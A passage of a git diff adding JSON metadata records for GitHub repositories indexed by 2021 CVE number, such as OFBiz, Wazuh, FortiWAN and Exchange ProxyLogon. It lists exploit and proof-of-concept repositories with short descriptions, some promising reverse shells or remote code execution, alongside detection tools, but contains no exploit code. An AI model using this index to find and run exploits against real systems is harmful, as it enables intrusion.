], + "visibility": "public", + "forks": 7, + "watchers": 23, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2021/CVE-2021-26088.json b/2021/CVE-2021-26088.json new file mode 100644 index 0000000000..d6937a2b16 --- /dev/null +++ b/2021/CVE-2021-26088.json @@ -0,0 +1,33 @@ +[ + { + "id": 638485881, + "name": "CVE-2021-26088", + "full_name": "theogobinet\/CVE-2021-26088", + "owner": { + "login": "theogobinet", + "id": 30470719, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/30470719?v=4", + "html_url": "https:\/\/github.com\/theogobinet", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/theogobinet\/CVE-2021-26088", + "description": "PoC for CVE-2021-26088 written in PowerShell", + "fork": false, + "created_at": "2023-05-09T13:13:41Z", + "updated_at": "2024-09-17T21:56:55Z", + "pushed_at": "2023-05-09T13:18:45Z", + "stargazers_count": 3, + "watchers_count": 3, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 3, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2021/CVE-2021-26102.json b/2021/CVE-2021-26102.json new file mode 100644 index 0000000000..84cd539634 --- /dev/null +++ b/2021/CVE-2021-26102.json @@ -0,0 +1,33 @@ +[ + { + "id": 436616739, + "name": "CVE-2021-26102", + "full_name": "SleepyCofe\/CVE-2021-26102", + "owner": { + "login": "SleepyCofe", + "id": 95385010, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/95385010?v=4", + "html_url": "https:\/\/github.com\/SleepyCofe", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/SleepyCofe\/CVE-2021-26102", + "description": "PoC of FortiWAN auth bypass (https:\/\/www.fortiguard.com\/psirt\/FG-IR-21-048)", + "fork": false, + "created_at": "2021-12-09T12:55:30Z", + "updated_at": "2023-03-14T02:14:06Z", + "pushed_at": "2022-01-20T14:53:49Z", + "stargazers_count": 8, + "watchers_count": 8, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 8, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2021/CVE-2021-26121.json b/2021/CVE-2021-26121.json new file mode 100644 index 0000000000..881a1936b1 --- /dev/null +++ b/2021/CVE-2021-26121.json @@ -0,0 +1,33 @@ +[ + { + "id": 338405594, + "name": "CVE-2021-26121", + "full_name": "sourceincite\/CVE-2021-26121", + "owner": { + "login": "sourceincite", + "id": 13770985, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/13770985?v=4", + "html_url": "https:\/\/github.com\/sourceincite", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/sourceincite\/CVE-2021-26121", + "description": null, + "fork": false, + "created_at": "2021-02-12T18:53:37Z", + "updated_at": "2024-08-12T20:10:19Z", + "pushed_at": "2021-04-30T15:45:02Z", + "stargazers_count": 12, + "watchers_count": 12, + "has_discussions": false, + "forks_count": 8, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 8, + "watchers": 12, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2021/CVE-2021-26258.json b/2021/CVE-2021-26258.json new file mode 100644 index 0000000000..2f9e7443d9 --- /dev/null +++ b/2021/CVE-2021-26258.json @@ -0,0 +1,33 @@ +[ + { + "id": 579219511, + "name": "CVE-2021-26258", + "full_name": "zwclose\/CVE-2021-26258", + "owner": { + "login": "zwclose", + "id": 29465842, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/29465842?v=4", + "html_url": "https:\/\/github.com\/zwclose", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/zwclose\/CVE-2021-26258", + "description": "Files and tools for CVE-2021-26258", + "fork": false, + "created_at": "2022-12-17T00:59:32Z", + "updated_at": "2022-12-24T08:39:43Z", + "pushed_at": "2022-12-18T03:14:54Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2021/CVE-2021-26295.json b/2021/CVE-2021-26295.json new file mode 100644 index 0000000000..2eccf5a935 --- /dev/null +++ b/2021/CVE-2021-26295.json @@ -0,0 +1,157 @@ +[ + { + "id": 350761950, + "name": "CVE-2021-26295", + "full_name": "yumusb\/CVE-2021-26295", + "owner": { + "login": "yumusb", + "id": 43062104, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/43062104?v=4", + "html_url": "https:\/\/github.com\/yumusb", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/yumusb\/CVE-2021-26295", + "description": null, + "fork": false, + "created_at": "2021-03-23T15:25:01Z", + "updated_at": "2024-08-12T20:11:29Z", + "pushed_at": "2021-04-01T10:38:18Z", + "stargazers_count": 23, + "watchers_count": 23, + "has_discussions": false, + "forks_count": 11, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 11, + "watchers": 23, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 351001241, + "name": "CVE-2021-26295-Apache-OFBiz", + "full_name": "rakjong\/CVE-2021-26295-Apache-OFBiz", + "owner": { + "login": "rakjong", + "id": 38517715, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/38517715?v=4", + "html_url": "https:\/\/github.com\/rakjong", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/rakjong\/CVE-2021-26295-Apache-OFBiz", + "description": "CVE-2021-26295 Apache OFBiz rmi反序列化POC", + "fork": false, + "created_at": "2021-03-24T08:25:04Z", + "updated_at": "2022-01-13T12:15:38Z", + "pushed_at": "2021-03-24T09:01:11Z", + "stargazers_count": 4, + "watchers_count": 4, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 4, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 351367125, + "name": "CVE-2021-26295", + "full_name": "dskho\/CVE-2021-26295", + "owner": { + "login": "dskho", + "id": 32945923, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/32945923?v=4", + "html_url": "https:\/\/github.com\/dskho", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/dskho\/CVE-2021-26295", + "description": "CVE-2021-26295 EXP 可成功反弹Shell", + "fork": false, + "created_at": "2021-03-25T08:50:10Z", + "updated_at": "2024-08-12T20:11:32Z", + "pushed_at": "2021-03-25T02:55:27Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 15, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 15, + "watchers": 0, + "score": 0, + "subscribers_count": 0 + }, + { + "id": 356332111, + "name": "CVE-2021-26295--", + "full_name": "coolyin001\/CVE-2021-26295--", + "owner": { + "login": "coolyin001", + "id": 82075508, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/82075508?v=4", + "html_url": "https:\/\/github.com\/coolyin001", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/coolyin001\/CVE-2021-26295--", + "description": "CVE-2021-26295-POC 利用DNSlog进行CVE-2021-26295的漏洞验证。 使用 poc:将目标放于target.txt后运行python poc.py即可。(Jdk环境需<12,否则ysoserial无法正常生成有效载荷) exp:python exp.py https:\/\/baidu.com然后进入命令执行界面(无回显)", + "fork": false, + "created_at": "2021-04-09T16:20:18Z", + "updated_at": "2021-04-09T16:20:21Z", + "pushed_at": "2021-04-09T16:22:14Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 367057442, + "name": "ofbiz-poc", + "full_name": "yuaneuro\/ofbiz-poc", + "owner": { + "login": "yuaneuro", + "id": 42265015, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/42265015?v=4", + "html_url": "https:\/\/github.com\/yuaneuro", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/yuaneuro\/ofbiz-poc", + "description": "CVE-2020-9496和CVE-2021-26295利用dnslog批量验证漏洞poc及exp", + "fork": false, + "created_at": "2021-05-13T13:28:15Z", + "updated_at": "2024-08-12T20:12:58Z", + "pushed_at": "2021-05-13T13:53:50Z", + "stargazers_count": 6, + "watchers_count": 6, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 6, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2021/CVE-2021-26411.json b/2021/CVE-2021-26411.json new file mode 100644 index 0000000000..718a888fb7 --- /dev/null +++ b/2021/CVE-2021-26411.json @@ -0,0 +1,33 @@ +[ + { + "id": 430701138, + "name": "CVE-2021-26411", + "full_name": "CrackerCat\/CVE-2021-26411", + "owner": { + "login": "CrackerCat", + "id": 17995064, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/17995064?v=4", + "html_url": "https:\/\/github.com\/CrackerCat", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/CrackerCat\/CVE-2021-26411", + "description": null, + "fork": false, + "created_at": "2021-11-22T12:40:10Z", + "updated_at": "2024-01-07T22:48:02Z", + "pushed_at": "2021-11-18T08:33:05Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 6, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 6, + "watchers": 2, + "score": 0, + "subscribers_count": 0 + } +] \ No newline at end of file diff --git a/2021/CVE-2021-26414.json b/2021/CVE-2021-26414.json new file mode 100644 index 0000000000..064a6158d7 --- /dev/null +++ b/2021/CVE-2021-26414.json @@ -0,0 +1,33 @@ +[ + { + "id": 557378926, + "name": "dcom_10036_Solver", + "full_name": "Nels2\/dcom_10036_Solver", + "owner": { + "login": "Nels2", + "id": 55712980, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/55712980?v=4", + "html_url": "https:\/\/github.com\/Nels2", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Nels2\/dcom_10036_Solver", + "description": "This script was created to automate addressing the vulnerability described in CVE-2021-26414 (https:\/\/support.microsoft.com\/en-us\/topic\/kb5004442-manage-changes-for-windows-dcom-server-security-feature-bypass-cve-2021-26414-f1400b52-c141-43d2-941e-37ed901c769c), adds two regkeys under HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Ole\\AppCompa", + "fork": false, + "created_at": "2022-10-25T15:24:03Z", + "updated_at": "2022-10-25T15:25:33Z", + "pushed_at": "2022-10-25T15:28:37Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2021/CVE-2021-26415.json b/2021/CVE-2021-26415.json new file mode 100644 index 0000000000..2cec150180 --- /dev/null +++ b/2021/CVE-2021-26415.json @@ -0,0 +1,33 @@ +[ + { + "id": 360537622, + "name": "CVE-2021-26415", + "full_name": "adenkiewicz\/CVE-2021-26415", + "owner": { + "login": "adenkiewicz", + "id": 1060275, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/1060275?v=4", + "html_url": "https:\/\/github.com\/adenkiewicz", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/adenkiewicz\/CVE-2021-26415", + "description": "All files needed to reproduce PoC for CVE-2021-26415: https:\/\/www.cloaked.pl\/2021\/04\/cve-2021-26415\/", + "fork": false, + "created_at": "2021-04-22T13:55:40Z", + "updated_at": "2022-03-11T02:42:26Z", + "pushed_at": "2021-04-22T14:04:46Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 2, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2021/CVE-2021-26690.json b/2021/CVE-2021-26690.json new file mode 100644 index 0000000000..f1297e0146 --- /dev/null +++ b/2021/CVE-2021-26690.json @@ -0,0 +1,64 @@ +[ + { + "id": 386164563, + "name": "CVE-2021-26690", + "full_name": "dja2TaqkGEEfA45\/CVE-2021-26690", + "owner": { + "login": "dja2TaqkGEEfA45", + "id": 82131630, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/82131630?v=4", + "html_url": "https:\/\/github.com\/dja2TaqkGEEfA45", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/dja2TaqkGEEfA45\/CVE-2021-26690", + "description": null, + "fork": false, + "created_at": "2021-07-15T04:38:43Z", + "updated_at": "2021-07-15T04:38:43Z", + "pushed_at": "2021-07-15T04:38:44Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 881995106, + "name": "CVE-2021-26690---Apache-mod_session", + "full_name": "7own\/CVE-2021-26690---Apache-mod_session", + "owner": { + "login": "7own", + "id": 71826295, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/71826295?v=4", + "html_url": "https:\/\/github.com\/7own", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/7own\/CVE-2021-26690---Apache-mod_session", + "description": "CVE-2021-26690 patch diffing - Apache HTTP mod_session NULL pointer dereference", + "fork": false, + "created_at": "2024-11-01T16:51:23Z", + "updated_at": "2024-11-01T17:05:24Z", + "pushed_at": "2024-11-01T17:05:20Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2021/CVE-2021-26691.json b/2021/CVE-2021-26691.json new file mode 100644 index 0000000000..24a5f0dda1 --- /dev/null +++ b/2021/CVE-2021-26691.json @@ -0,0 +1,33 @@ +[ + { + "id": 386164410, + "name": "CVE-2021-26691", + "full_name": "dja2TaqkGEEfA45\/CVE-2021-26691", + "owner": { + "login": "dja2TaqkGEEfA45", + "id": 82131630, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/82131630?v=4", + "html_url": "https:\/\/github.com\/dja2TaqkGEEfA45", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/dja2TaqkGEEfA45\/CVE-2021-26691", + "description": null, + "fork": false, + "created_at": "2021-07-15T04:37:58Z", + "updated_at": "2021-07-15T04:37:58Z", + "pushed_at": "2021-07-15T04:37:59Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2021/CVE-2021-26700.json b/2021/CVE-2021-26700.json new file mode 100644 index 0000000000..1a120082de --- /dev/null +++ b/2021/CVE-2021-26700.json @@ -0,0 +1,64 @@ +[ + { + "id": 338818030, + "name": "CVE-2021-26700", + "full_name": "jackadamson\/CVE-2021-26700", + "owner": { + "login": "jackadamson", + "id": 7891953, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/7891953?v=4", + "html_url": "https:\/\/github.com\/jackadamson", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/jackadamson\/CVE-2021-26700", + "description": "RCE in NPM VSCode Extension", + "fork": false, + "created_at": "2021-02-14T14:01:04Z", + "updated_at": "2022-10-18T06:03:27Z", + "pushed_at": "2021-04-11T13:45:11Z", + "stargazers_count": 20, + "watchers_count": 20, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 20, + "score": 0, + "subscribers_count": 3 + }, + { + "id": 614903179, + "name": "CVE-2021-26700", + "full_name": "june-in-exile\/CVE-2021-26700", + "owner": { + "login": "june-in-exile", + "id": 26154393, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/26154393?v=4", + "html_url": "https:\/\/github.com\/june-in-exile", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/june-in-exile\/CVE-2021-26700", + "description": null, + "fork": false, + "created_at": "2023-03-16T14:49:28Z", + "updated_at": "2023-05-17T19:19:18Z", + "pushed_at": "2023-05-17T20:46:09Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2021/CVE-2021-26708.json b/2021/CVE-2021-26708.json new file mode 100644 index 0000000000..5945dcf9be --- /dev/null +++ b/2021/CVE-2021-26708.json @@ -0,0 +1,64 @@ +[ + { + "id": 339197991, + "name": "vsock_poc", + "full_name": "jordan9001\/vsock_poc", + "owner": { + "login": "jordan9001", + "id": 10539462, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/10539462?v=4", + "html_url": "https:\/\/github.com\/jordan9001", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/jordan9001\/vsock_poc", + "description": "Investigating the bug behind CVE-2021-26708", + "fork": false, + "created_at": "2021-02-15T20:27:06Z", + "updated_at": "2024-11-12T05:40:39Z", + "pushed_at": "2021-02-16T03:03:54Z", + "stargazers_count": 27, + "watchers_count": 27, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 27, + "score": 0, + "subscribers_count": 5 + }, + { + "id": 347897537, + "name": "CVE-2021-26708", + "full_name": "azpema\/CVE-2021-26708", + "owner": { + "login": "azpema", + "id": 43499244, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/43499244?v=4", + "html_url": "https:\/\/github.com\/azpema", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/azpema\/CVE-2021-26708", + "description": null, + "fork": false, + "created_at": "2021-03-15T08:52:54Z", + "updated_at": "2022-01-14T12:06:51Z", + "pushed_at": "2021-06-12T14:22:54Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2021/CVE-2021-26714.json b/2021/CVE-2021-26714.json new file mode 100644 index 0000000000..e5d518342e --- /dev/null +++ b/2021/CVE-2021-26714.json @@ -0,0 +1,33 @@ +[ + { + "id": 375060087, + "name": "CVE-2021-26714", + "full_name": "PwCNO-CTO\/CVE-2021-26714", + "owner": { + "login": "PwCNO-CTO", + "id": 58770486, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/58770486?v=4", + "html_url": "https:\/\/github.com\/PwCNO-CTO", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/PwCNO-CTO\/CVE-2021-26714", + "description": "Directory Traversal vulnerability in Enterprise License Manager portal in Mitel MiContact Center Enterprise before 9.4", + "fork": false, + "created_at": "2021-06-08T15:33:51Z", + "updated_at": "2021-06-08T15:34:26Z", + "pushed_at": "2021-06-08T15:34:22Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2021/CVE-2021-26814.json b/2021/CVE-2021-26814.json new file mode 100644 index 0000000000..b770e8fad7 --- /dev/null +++ b/2021/CVE-2021-26814.json @@ -0,0 +1,98 @@ +[ + { + "id": 368141608, + "name": "CVE-2021-26814", + "full_name": "WickdDavid\/CVE-2021-26814", + "owner": { + "login": "WickdDavid", + "id": 18442485, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/18442485?v=4", + "html_url": "https:\/\/github.com\/WickdDavid", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/WickdDavid\/CVE-2021-26814", + "description": "A simple python PoC to exploit CVE-2021-26814 and gain RCE on Wazuh Manager (v.4.0.0-4.0.3) through the API service.", + "fork": false, + "created_at": "2021-05-17T10:13:47Z", + "updated_at": "2024-08-12T20:13:05Z", + "pushed_at": "2021-05-18T15:15:40Z", + "stargazers_count": 3, + "watchers_count": 3, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 3, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 368546138, + "name": "CVE-2021-26814", + "full_name": "CYS4srl\/CVE-2021-26814", + "owner": { + "login": "CYS4srl", + "id": 72195371, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/72195371?v=4", + "html_url": "https:\/\/github.com\/CYS4srl", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/CYS4srl\/CVE-2021-26814", + "description": "PoC of CVE-2021-26814", + "fork": false, + "created_at": "2021-05-18T13:45:47Z", + "updated_at": "2021-09-12T05:15:35Z", + "pushed_at": "2021-05-18T15:13:16Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 2, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 384737658, + "name": "Internet-Security-Project---CVE-2021-26814", + "full_name": "paolorabbito\/Internet-Security-Project---CVE-2021-26814", + "owner": { + "login": "paolorabbito", + "id": 47228598, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/47228598?v=4", + "html_url": "https:\/\/github.com\/paolorabbito", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/paolorabbito\/Internet-Security-Project---CVE-2021-26814", + "description": null, + "fork": false, + "created_at": "2021-07-10T16:04:28Z", + "updated_at": "2021-12-03T14:48:22Z", + "pushed_at": "2021-12-03T14:48:19Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve", + "security" + ], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2021/CVE-2021-26828.json b/2021/CVE-2021-26828.json new file mode 100644 index 0000000000..8762a4b887 --- /dev/null +++ b/2021/CVE-2021-26828.json @@ -0,0 +1,33 @@ +[ + { + "id": 353202709, + "name": "CVE-2021-26828_ScadaBR_RCE", + "full_name": "hev0x\/CVE-2021-26828_ScadaBR_RCE", + "owner": { + "login": "hev0x", + "id": 6265911, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/6265911?v=4", + "html_url": "https:\/\/github.com\/hev0x", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/hev0x\/CVE-2021-26828_ScadaBR_RCE", + "description": null, + "fork": false, + "created_at": "2021-03-31T02:39:02Z", + "updated_at": "2024-08-12T20:11:42Z", + "pushed_at": "2021-06-11T03:53:22Z", + "stargazers_count": 3, + "watchers_count": 3, + "has_discussions": false, + "forks_count": 3, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 3, + "watchers": 3, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2021/CVE-2021-26832.json b/2021/CVE-2021-26832.json new file mode 100644 index 0000000000..0e9b8b37b1 --- /dev/null +++ b/2021/CVE-2021-26832.json @@ -0,0 +1,33 @@ +[ + { + "id": 357423084, + "name": "CVE-2021-26832", + "full_name": "NagliNagli\/CVE-2021-26832", + "owner": { + "login": "NagliNagli", + "id": 35578316, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/35578316?v=4", + "html_url": "https:\/\/github.com\/NagliNagli", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/NagliNagli\/CVE-2021-26832", + "description": "Cross Site Scripting (XSS) at the \"Reset Password\" page form of Priority Enterprise Management System v8.00 allows attackers to execute javascript on behalf of the victim by sending a malicious URL or directing the victim to a malicious site.", + "fork": false, + "created_at": "2021-04-13T04:25:31Z", + "updated_at": "2024-08-12T20:12:06Z", + "pushed_at": "2021-04-13T04:26:25Z", + "stargazers_count": 5, + "watchers_count": 5, + "has_discussions": false, + "forks_count": 3, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 3, + "watchers": 5, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2021/CVE-2021-26855.json b/2021/CVE-2021-26855.json new file mode 100644 index 0000000000..cf57e5bb80 --- /dev/null +++ b/2021/CVE-2021-26855.json @@ -0,0 +1,1508 @@ +[ + { + "id": 344161221, + "name": "exchange-0days-202103", + "full_name": "sgnls\/exchange-0days-202103", + "owner": { + "login": "sgnls", + "id": 11134228, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/11134228?v=4", + "html_url": "https:\/\/github.com\/sgnls", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/sgnls\/exchange-0days-202103", + "description": "IoC determination for exploitation of CVE-2021-26855, CVE-2021-26857, CVE-2021-26858 and CVE-2021-27065.", + "fork": false, + "created_at": "2021-03-03T14:50:16Z", + "updated_at": "2022-11-25T07:49:01Z", + "pushed_at": "2021-03-15T11:42:06Z", + "stargazers_count": 5, + "watchers_count": 5, + "has_discussions": false, + "forks_count": 4, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 4, + "watchers": 5, + "score": 0, + "subscribers_count": 3 + }, + { + "id": 344210374, + "name": "HAFNIUM-IOC", + "full_name": "soteria-security\/HAFNIUM-IOC", + "owner": { + "login": "soteria-security", + "id": 49722282, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/49722282?v=4", + "html_url": "https:\/\/github.com\/soteria-security", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/soteria-security\/HAFNIUM-IOC", + "description": "A PowerShell script to identify indicators of exploitation of CVE-2021-26855, CVE-2021-26857, CVE-2021-26858, and CVE-2021-26865", + "fork": false, + "created_at": "2021-03-03T17:36:18Z", + "updated_at": "2023-08-03T19:21:00Z", + "pushed_at": "2021-03-05T17:09:01Z", + "stargazers_count": 21, + "watchers_count": 21, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 21, + "score": 0, + "subscribers_count": 3 + }, + { + "id": 344742582, + "name": "exchange_webshell_detection", + "full_name": "cert-lv\/exchange_webshell_detection", + "owner": { + "login": "cert-lv", + "id": 22764485, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/22764485?v=4", + "html_url": "https:\/\/github.com\/cert-lv", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/cert-lv\/exchange_webshell_detection", + "description": "Detect webshells dropped on Microsoft Exchange servers exploited through \"proxylogon\" group of vulnerabilites (CVE-2021-26855, CVE-2021-26857, CVE-2021-26858, CVE-2021-27065)", + "fork": false, + "created_at": "2021-03-05T08:22:07Z", + "updated_at": "2024-07-29T15:51:12Z", + "pushed_at": "2021-03-16T08:34:14Z", + "stargazers_count": 98, + "watchers_count": 98, + "has_discussions": false, + "forks_count": 20, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "blueteam", + "exchange-server", + "infosec", + "iocs", + "security", + "security-audit" + ], + "visibility": "public", + "forks": 20, + "watchers": 98, + "score": 0, + "subscribers_count": 14 + }, + { + "id": 345052378, + "name": "Microsoft_Exchange_Server_SSRF_CVE-2021-26855", + "full_name": "conjojo\/Microsoft_Exchange_Server_SSRF_CVE-2021-26855", + "owner": { + "login": "conjojo", + "id": 79626719, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/79626719?v=4", + "html_url": "https:\/\/github.com\/conjojo", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/conjojo\/Microsoft_Exchange_Server_SSRF_CVE-2021-26855", + "description": "Microsoft Exchange Server SSRF漏洞(CVE-2021-26855)", + "fork": false, + "created_at": "2021-03-06T09:15:55Z", + "updated_at": "2024-11-01T02:37:58Z", + "pushed_at": "2021-03-06T10:34:49Z", + "stargazers_count": 36, + "watchers_count": 36, + "has_discussions": false, + "forks_count": 8, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 8, + "watchers": 36, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 345173055, + "name": "CVE-2021-26855-SSRF", + "full_name": 